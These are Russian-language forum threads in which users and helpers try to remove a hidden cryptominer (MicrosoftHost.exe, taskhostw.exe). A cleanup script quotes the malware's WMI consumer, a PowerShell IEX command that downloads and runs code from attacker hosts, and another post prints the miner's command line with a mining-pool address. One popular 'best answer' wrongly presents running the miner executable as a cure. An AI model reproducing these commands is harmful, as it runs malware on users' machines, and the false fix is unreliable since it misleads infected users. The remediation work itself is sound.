Майнеры MicrosoftHost.exe, taskhostw.exe и т.д. — Как удалить?
Столкнулся с проблемой двух майнеров — MicrosoftHost и taskhostw EXE. Как удалить? Первым делом скачиваем программу TotalCommand и включаем её с правами администратора (ПКМ — Открыть с правами администратора) Далее в верхней панели (Скриншот) Конфигурация — Настройка — Содержимое панелей — Скрытые и системные папки включаем. Идём по пути C\ProgramData и пытаемся удалить папку WindowsTask. То что нельзя удалить — пропускаем. Так же делаем и с папкой RealtekHD, там находится taskhostw и taskhost (Майнеры). Пытаемся снять защиту от записи для удаления ост. файлов: (Скриншот) Нажимаем ЛКМ по папке, в верхней панели Файлы — Изменение атрибутов — Убираем галочку с Только для чтения. Если не помогло — Ищем в папке загрузки TotalCommand wincmd.ini — Свойства — Безопасность — Группы пользователей — Изменить (Скриншот). Если и это не помогло, пытаемся изменить все exe файлы через Notepad, удаляя весь код из него — Зажатие ПКМ по файлу — Открыть с помощью (X64/x32>Notepad++|Notepad). Удаляем весь текст, если пишет что файл открыт в другой программе, завершаем её через диспетчер задач (кроме System). Буквально, все мои шаги. Надеюсь, не смотря на такую неудобную инструкцию я смог вам помочь! (И снова простите за инструкцию, тут нельзя отступать строчки для удобства)
Голосование за лучший ответ
cкачай drweb
ASK MEMBERУченик (170) 1 год назад
Майнер MicrosoftHost.exe
Здравствуйте!
Похожая проблема здесь уже была.
С помощью программы AIDA64 был вычислен процесс C:\ProgramData\WindowsTask\MicrosoftHost.exe
который заполняет память при запуске более чем на половину и может даже вызвать синий экран. В диспетчере задач этот процесс невидим. Сам диспетчер задач закрывается сразу как переходишь к любому другому окну.
Ещё видимо родительские процессы:
taskhost.exe C:\ProgramData\Realtek\taskhost.exe 64 бит 31240 КБ 21 КБ
taskhostw.exe C:\ProgramData\Realtek\taskhostw.exe 64 бит 21016 КБ 14 КБ
taskhost.exe C:\ProgramData\RealtekHD\taskhost.exe 64 бит 81132 КБ 66 КБ
audiodg.exe C:\ProgramData\WindowsTask\audiodg.exe 64 бит 40544 КБ 26 КБ
Дополнительно перегружает сеть и нагревает сильно процессор градусов на 20 минимум.
Ещё заметил в папках винды C:\ProgramData; C:\Program Files и других созданы пустые папки с названиями всех известных антивирусов такого вида C:\Program Files (x86)\Kaspersky Lab
| CollectionLog-2023.01.07-13.38.zip (47.4 Кб, 14 просмотров) |
Лучшие ответы ( 1 )
| Здесь вы можете заказать любую студенческую или школьную работу. |
94731 / 64177 / 26122
Регистрация: 12.04.2006
Сообщений: 116,782
Ответы с готовыми решениями:
Вирус — майнер MicrosoftHost.exe, AppModule.exe и другие. не удается вылечить Win 11 x64
Уважаемые кибер-полисмены. Молю о помощи, словил майнер по своей глупости:-|, скачал игру с.
Майнер MicrosoftHost.exe и AppModule.exe. UVS логи
Здравствуйте, господа погроммисты! Сегодня наткнулся на такую х. плохую вещь на своем.
Майнер MicrosoftHost.exe и AppModule.exe. AVZ логи
Добрый день, господа! Через System explorer наткнулся на вот это вот.
Вирус — майнер MicrosoftHost.exe, AppModule.exe и тд
уважаемые люди понимающий в пк молю о помощи. примерно вчера либо позавчера обнаружил что процессор.
Регистрация: 20.06.2015
Сообщений: 24
Посмотрел аналогичные ветки и скачал AV block remover. Из винды не грузился никак, не помогало не переименование файла, ничего. Майнер глушил все варианты. Запустил из безопасного режима с поддержкой сети. Лог AV block и новый AutoLogger прилагаю.
| AV_block_remove_2023.01.07-16.40.log (9.8 Кб, 18 просмотров) |
| CollectionLog-2023.01.07-16.57.zip (48.1 Кб, 17 просмотров) |
21390 / 15367 / 2961
Регистрация: 08.10.2012
Сообщений: 62,506
Внимание! Рекомендации написаны специально для пользователя Jazzy. Если рекомендации написаны не для вас, не используйте их — это может повредить вашей системе.
Если у вас похожая проблема — создайте тему в разделе Лечение компьютерных вирусов и выполните Правила запроса о помощи.
______________________________________________________
begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); ClearQuarantineEx(true); TerminateProcessByName('C:\ProgramData\Realtek\taskhost.exe'); TerminateProcessByName('C:\ProgramData\Realtek\taskhostw.exe'); QuarantineFile('C:\ProgramData\Realtek\taskhost.exe', ''); QuarantineFile('C:\ProgramData\Realtek\taskhostw.exe', ''); QuarantineFileF('C:\ProgramData\Realtek\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); DeleteFile('C:\ProgramData\Realtek\taskhost.exe', '32'); DeleteFile('C:\ProgramData\Realtek\taskhostw.exe', '32'); DeleteFileMask('C:\ProgramData\Realtek\', '*', true); DeleteDirectory('C:\ProgramData\Realtek\'); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1); RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteRepair(1); ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.
Регистрация: 20.06.2015
Сообщений: 24
Спасибо! Скрипт выполнил. Farbar Recovery Scan Tool запустил и просканировал. Отчеты FRST.txt и Addition.txt собирался отправить. Открыл этот сайт и. через минуту синий экран и перегрузка памяти. Это только когда открываешь браузер. Телеграмм, например, память не грузит и майнеру видимо не интересен, а вот браузер глушит сразу.
Файлы отчета прикладываю
| FRST.zip (6.8 Кб, 9 просмотров) |
| Addition.zip (14.5 Кб, 6 просмотров) |
21390 / 15367 / 2961
Регистрация: 08.10.2012
Сообщений: 62,506
- Отключите до перезагрузки антивирус.
- Выделите следующий код:
Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Ограничение - L:\Setup.exe HKU\S-1-5-21-3355481898-3815133411-946143162-1000\. \MountPoints2: - N:\Setup.exe HKU\S-1-5-21-3355481898-3815133411-946143162-1000\. \MountPoints2: - L:\HiSuiteDownLoader.exe HKU\S-1-5-21-3355481898-3815133411-946143162-1000\. \MountPoints2: - O:\Setup.exe HKU\S-1-5-21-3355481898-3815133411-946143162-1000\. \MountPoints2: - L:\HiSuiteDownLoader.exe HKU\S-1-5-21-3355481898-3815133411-946143162-1000\. \MountPoints2: - L:\HiSuiteDownLoader.exe GroupPolicy: Ограничение ? CommandLineEventConsumer.Name=\"devFee2\"",Filter="__EventFilter.Name=\"devFee2\":: WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"BVTConsumer\"",Filter="__EventFilter.Name=\"BVTFilter\":: WMI:subscription\__EventFilter->devFee2::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] WMI:subscription\__EventFilter->BVTFilter::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99] WMI:subscription\CommandLineEventConsumer->devFee2::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://pw.webpublic.org/power3.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://pw.kiracoin.net/power3-1.txt')] WMI:subscription\CommandLineEventConsumer->BVTConsumer::[CommandLineTemplate => cscript KernCap.vbs][WorkingDirectory => C:\\tools\\kernrate] AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0] HKU\S-1-5-21-3355481898-3815133411-946143162-1000\Software\Classes\.scr: scrfile => Нет имени - - Нет файла FirewallRules: [] => (Allow) LPort=443 FirewallRules: [] => (Allow) LPort=44445 FirewallRules: [] => (Allow) LPort=55556 ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions EmptyTemp: Reboot: End::
Регистрация: 20.06.2015
Сообщений: 24
Скрипт выполнил. Лог отчета прилагаю
| Fixlog.txt (7.6 Кб, 13 просмотров) |
21390 / 15367 / 2961
Регистрация: 08.10.2012
Сообщений: 62,506
Что сейчас с проблемой?
Регистрация: 20.06.2015
Сообщений: 24
Спасибо. Вроде всё в порядке. Использование ресурсов в норме. Поставил антивирус. Порекомендуете как избежать подобного?
21390 / 15367 / 2961
Регистрация: 08.10.2012
Сообщений: 62,506
Конкретно этот майнер попадает в систему при установке некоего репака, скачанного с торрента или активатора.
Общие рекомендации будут чуть позже. Пока в завершение:
1.
Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.
Остальные утилиты лечения и папки можно просто удалить.
- Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
- Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
- Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
- Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
- Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
- Прикрепите этот файл к своему следующему сообщению.
Регистрация: 20.06.2015
Сообщений: 24
Скачал проверил. Вот файл
| SecurityCheck.txt (15.4 Кб, 7 просмотров) |
21390 / 15367 / 2961
Регистрация: 08.10.2012
Сообщений: 62,506
Сообщение было отмечено Jazzy как решение
Решение
——————————- [ Windows ] ——————————-
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 11.0.9600.18537 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
Дата установки обновлений: 2020-04-29 19:03:10
——————————- [ HotFix ] ———————————
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4565354 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
———————- [ AntiVirusFirewallInstall ] ————————
ESET Smart Security v.8.0.319.1 Внимание! Скачать обновления
————————— [ OtherUtilities ] —————————-
Microsoft .NET Framework 4.7 v.4.7.02053 Внимание! Скачать обновления
TeamViewer v.15.2.2756 Внимание! Скачать обновления
TeamViewer 12 v.12.0.71503 Внимание! Скачать обновления
—————————— [ ArchAndFM ] ——————————
WinRAR 5.50 (64-разрядная) v.5.50.0 Внимание! Скачать обновления
——————————- [ Imaging ] ——————————-
IrfanView 64 (remove only) v.4.42 Внимание! Скачать обновления
——————————— [ Media ] ———————————
K-Lite Codec Pack 13.2.6 Basic v.13.2.6 Внимание! Скачать обновления
——————————- [ Browser ] ——————————-
Opera Stable 84.0.4316.31 v.84.0.4316.31 Внимание! Скачать обновления
^Проверьте обновления через меню Обновление и восстановление!^
Opera Stable 93.0.4585.37 v.93.0.4585.37 Внимание! Скачать обновления
^Проверьте обновления через меню Обновление и восстановление!^
—————————- [ UnwantedApps ] ——————————
Bonjour v.3.0.0.10 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
IObit Unlocker v.1.1 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Wise Registry Cleaner 10.8.3 v.10.8.3 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра . Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии. Компьютерные эксперты не рекомендуют использовать такие программы.
Screenshot v.1.1.1 Внимание! Подозрение на Adware! Если данная программа Вам неизвестна, рекомендуется ее деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware и Malwarebytes AdwCleaner . Перед деинсталляцией и сканированием обязательно проконсультируйтесь в теме форума, где Вам оказывается помощь.
Выше перечисленное следует по возможности исправить.
Майнер microsofthost.exe в процессах
Здравствуйте, поймал данный майнер и даже не помню где именно, и думать на что не знаю. Думаю описание вам известно: закрывается после открытия диспетчера задач. Я пытался найти его расположение через прогу System Explorer, и как бы да, я вижу этот процесс, он уже не скрывается но месторасположение у него странное. он находится на диске C в папке WindowTask, и при переходе в неё она оказывается пустой, а сама папка windowTask на диске не отображается, только через -«показать расположение файла можно её найти». собственно два вопроса как это убить и где живёт автор данного майнера, руку бы ему пожал.
Лучший ответ
можно попробовать — зайти через System Explorer. Найти данный файл и зайти в его свойства, там изменить название дабы, хрен открывавший его, не мог найти данный файл, а также поменяй на всякий случай его доступ на запрещено.
АНДРЕЙ МАСОРИНУченик (153) 2 года назад
Спас мужик
Остальные ответы
Снови винду, иначе те пипец
Дима ДементьевМастер (1915) 3 года назад
установщика винды нет. да и вроде пишут что майнер это подавляет. Да его можно контрить открытием диспетчера задач, и он как таракан от включённой лампы убежит.
в программе system explorer нашел эти 2 жука
Потом нашел их директорию и удалил (Если не удаляется «Файл уже открыт в..» то просто выключи её в system explorer и сразу же удали в папке (у тебя будет секунд 5) )
Дима ДементьевМастер (1915) 3 года назад
уже видел этот комментарий на каком-то сайте. Дело в том что судя по всему этот червь эволюционировал, и как я уже написал «он находится на диске C в папке WindowTask, и при переходе в неё она оказывается пустой». про какие там 5 секунд говорят — понятия не имею.
ZeM@Профи (641) 3 года назад
Да можно по-подробней. Такая же проблема (
Просто переименовать недостаточно, там все равно работают процессы, которые пытаются запустить сам вирус и закрывают диспетчер задач
В параметрах папки, вкладка «Вид» внизу галочку поставить на «показывать скрытые файлы» и галочку снять на «скрывать защищённые системные файлы»
Идём в папку ProgramData, там 2 папки: RealtekHD и WindowsTask. Сначала удаляем первую, потом вторую
Даниил МочневУченик (227) 1 год назад
Дай бог тебе здоровья, подхватил данный вирус, сначала грешил на плохую оптимизацию винды, и там уже по нарастающей, прогой Hitman pro увидел название вируса, просто не понял почему скрытые файлы не отображаются, и вот наткнулся. Всем всего.
Как удалить скрытый майнер с ПК?
Смотрел на форумах но там все сложно непонятно, может кто-то подробно объяснит как его удалить?
Лучший ответ
Запоминайте друзья, сам только что поборол эту херь.
Открываем мой компухтер и вставляем путь на майнер: C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u RandomX_CPU —donate-level=1 -k -t2
Внося небольшие коррективы, и жмём «Enter»
Всё майнер сломан!
Так как это не вирус, а скрипт в винде Антивирусы бесполезны
Надеюсь помог, всем добра!
BARSIKЗнаток (280) 2 года назад
C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://lod -u RandomX_CPU —donate-level=0 -k -t2 вот кому лень скрины разглядывать
denchik ne slez ЛоховскийУченик (108) 2 года назад
открылось это окно черное, что дальше то? вируса больше нет или теперь можно устоновить антивирус который он ранне не давал скачать?
denchik ne slez Лоховский, чтоб открыть доступ к скачиванию: 1) Открываем проводник и в строку поиска пишем след: C:\Windows\System32\drivers\etc В текущей папке должен быть файл hosts, но такого вы не увидите, т. к его попросту скрыло. 2) Открываем консоль (для удобства в той же строке поиска пишем cmd) 3) Вставляем след: attrib -s -a -h C:\Windows\System32\drivers\etc 4) Далее заходим в файл (можно открыть через тот же блокнот). В открывшемся файле вы должны увидеть ряд строк примерно такого рода: 127.0.0.1support.kaspersky.ru (у меня данная строка была выше остальных) За ней будет также куча адресов. Просто удаляем их и сохраняем файл, после чего у вас появится доступ к сайтам. P.s В «hosts (Original)» хранится оригинал, но если вы не уверены что удаляете из hosts — поищите в интернете.
str xcomУченик (128) 2 года назад
збс чётко)) так и надо
newaccount ZeroDayЗнаток (276) 1 год назад
Я как-то сам фиксил, но недавно качнул вот эту дичь, и не смог вспомнить, в итоге просто погуглил, теперь эта па—а закрывает маил ответы, зато успел скопировать всю страницу, спасибо, помог
Амаль АпачевУченик (166) 10 месяцев назад
здравствуйте, кто может помочь через анидеск или таймвивер?
danil sasЗнаток (328) 2 месяца назад
Майнер закрывает програм дату
Остальные ответы
утилой Dr.Web CureIt! https://free.drweb.ru/cureit/ ,в безопасном режиме.
Данил МетальниковУченик (119) 2 года назад
не октрывается сайт
Влад Сергеев Искусственный Интеллект (145500) Данил Метальников, загрузись с безопасный режим с поддержкой сети, ( интернет подключай через кабель) и скачай.
Данил МетальниковУченик (119) 2 года назад
скачиваю с другого сайта, весчит 230мб, это нормально?
Влад Сергеев Искусственный Интеллект (145500) Данил Метальников, вполне.
Кирилл СоловьёвЗнаток (378) 2 года назад
что делать если все антивирусы крашит этот вирус?
Странник Искусственный Интеллект (317364) Кирилл Соловьёв, В смысле, крашит? Пробуйте в безопасном режиме сканировать. Инет пи этом отключайте. Или скачивайте загрузочный вариант сканера- с него и загружайтесь: https://www.kaspersky.ru/downloads/thank-you/free-rescue-disk
SnowShineЗнаток (398) 1 год назад
Большое вам спасибо за эту утилиту. Как выяснилось, у меня тоже был встроен майнер, хотя сначала я думала, что проблемы с видеокартой и как только я не мучала драйвера.
Интересно, что антивирус каким я воспользовалась (UnHackMe) обнаружил этот майнер и вроде даже удалил, но он опять появился как ни в чем не бывало. а эта программа все сделала быстро и по красоте (еще и другие трояны обнаружила)
Еще раз спасибо вам.
Странник Искусственный Интеллект (317364) SnowShine, Удачи.
даня морозУченик (114) 8 месяцев назад
я сначала скачал Rkill он ничего не находил но при этом майнер прекращал работу за это время я зашёл сюда увидел твой пост скачал касперский фулл проверил систему всё удалил и вроде как всё хорошо ) спасибо
SERG VEGASПрофи (534) 5 месяцев назад
Касперский самый говённый антивирусник!И антивирус не удалят майнеры для это отдельные проги.
Сегодня тоже столкнулся с подобной ерундой.
Признаки ее наличия.
1) При отключенных приложениях ноут начинает перегреваться.
2) Открыв диспетчер задач, видим резкий скачек активности до 100% и тут же падение до нормального состояния, это связано с тем, что при открытии диспетчера задач эта прога останавливает свою деятельность и скрывается из диспетчера задач.
3) Диспетчер задач автоматически закрывается в течении пары минут и майнер продолжает работать.
4) Аналогично диспетчеру автоматом вырубается отображение скрытых и системных файлов.
5) Если скачать прогу ProxyFier и подключившись к любому VPN в списке у меня как раз появлялась прога которая стучалась на подозрительный сайт.
6) В Host файле заблокированы все ресурсы которые могут помочь решить проблему.
Судя по коментам выше мне попался более извращенный вариант майнера. Просто удалить или сломать файл не получалось, он каждый раз пересоздавался какой то другой прогой.
Действия необходимые для устранения конкретно моей версии:
1) Скачиваем ProxiFier или любой другой прокси менеджер который покажет какие программы пытаются отправлять данные.
2) Открываем файл C:\Windows\System32\drivers\etc\hosts и удаляем все заблокированные ресурсы такого вида:
127.0.0.1 support.kaspersky.ru
127.0.0.1 kaspersky.ru
.
и. т. д.
Майнер заблочил порядка 150 сайтов антивирусов и прочих.
3) Открываем Планировщик задач, (Ищем его в поиске windows)
В левой колонке открываем папку Библиотека планировщика заданий->Microsoft->Windows
В моем случае понадобилось отключить все задачи в папке Wininet
4) В папке C:\ProgramData\WindowsTask нужно заменить все файлы на текстовые документы с точно таким же названием и расширение, а так же добавить им свойство (Только чтение) и желательно удались все права доступа к этим файлам
5) Аналогичные действия проделать с файлам в папке C:\ProgramData\RealtekHD
Как раз после этого перестал закрываться диспетчер задач и скрываться системные файлы.
На этом все, перезагружаем комп и смотри на результат.
Примечание:
Если после включения показа системных и скрытых файлов они не отобразились, попробуйте сделать это снова, предварительно закрыв окно настроек.
NikesЗнаток (385) 1 год назад
Парень, красава, все по списку помогло. От себя добавлю, что изначально стоят ограничения на запуск некоторых приложений, например антивирус. Их удалить можно через редактор реестра HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
В папке DisallowRun удалить значения с программами или всю папку
NikesЗнаток (385) 1 год назад
Единственное, что у меня до сих пор восстановление системы и создание точек не работает. Ошибка 0x81000203
Nikes Знаток (385) Получилось через восстановление службы в командной строке и добавлением нескольких строк в реестре
Pino Знаток (269) 1 год назад
Зашел в безопасный
Включил отображение скрытых системных файлов
C:\ProgramData\RealtekHD
C:\ProgramData\WindowsTask
сменил,через свойства, владельца и удалил
прогнал чистку реестра
перезагрузился
Планировщике заданий удалил остатки
перезагрузил и просмотрел в System Explorer — все ок
Сам виноват. Причиной стала игрушка в архиве Turing.Complete.Build.7544791.zip
Pino , спасибо тебе большое твой способ помог, всего тебе хорошего
скачал по своей ошибке файл с этим дерьмом
небыло не единого опасения и нате
Нашел решение сам
понадобится консоль
cd дальше путь, в моем случае был C:\ProgramData\WindowsTask\
но уверен создатель не заморачивался и сделал единый путь
после чего выдаем атрибуты принудительно в консоле — » attrib -s -h -r -a /s /d «
после у нас есть 1-3 секунд чтоб переключится на C:\ProgramData\WindowsTask\ тоесть директорию с майнером и там мы увидим уже те самые файлы
удаляем все, те что не удаляются оставляем, в моем случае было 2
повторяем это несколько раз пока не выйдет удалить 1 из этих 2х
дальше я так понимаю майнер бонально не может найти недостоющие файлы и крашится, воля
не знаю пока еще запускается ли он повторно при перезагрузке или же докачивает мейби недостоющие ( наврядли так будет продуманно )
но в любом случае мне это помогло
по крайней мере он перестал майнить но диспетчер задач все еще закрывается сам.
как решу допишу комментарий
Ivan UsernameУченик (132) 2 года назад
использовал «LockHunter» он на офф. сайте бесплатно скачивается
С помощью ее указывая путь до того самого файла можно его удалить
Ivan UsernameУченик (132) 2 года назад
C:\ProgramData\RealtekHD — еще одна директория где остались файлы майнера
через »LockHunter’ находим 2 процесса что расположены там и смело удаляем
Ivan Username Ученик (132) Ivan Username, Токо заметил, все файлы удаленные восстанавливаются
Попался на этакий майнер, перепробовал кучу способов, не вышло. С помощью System Explorer’а приостановил древо процессов этого майнера и всё, он перестал меня жрать
Я прост отключит все запланированные процессы в винде и отключил большое количество служб и он перестал работать, только диспетчер задач сам закрывается, но больше ничего не грузится
Обычно майнеры запускают процессы в диспетчере задач надо найти процесс с майнером потом кликнуть правой кнопкой мыши по процессу и нажать кнопку «открыть место хранение файла» и тебя отправил к файлу у меня это был фейковый steam.exe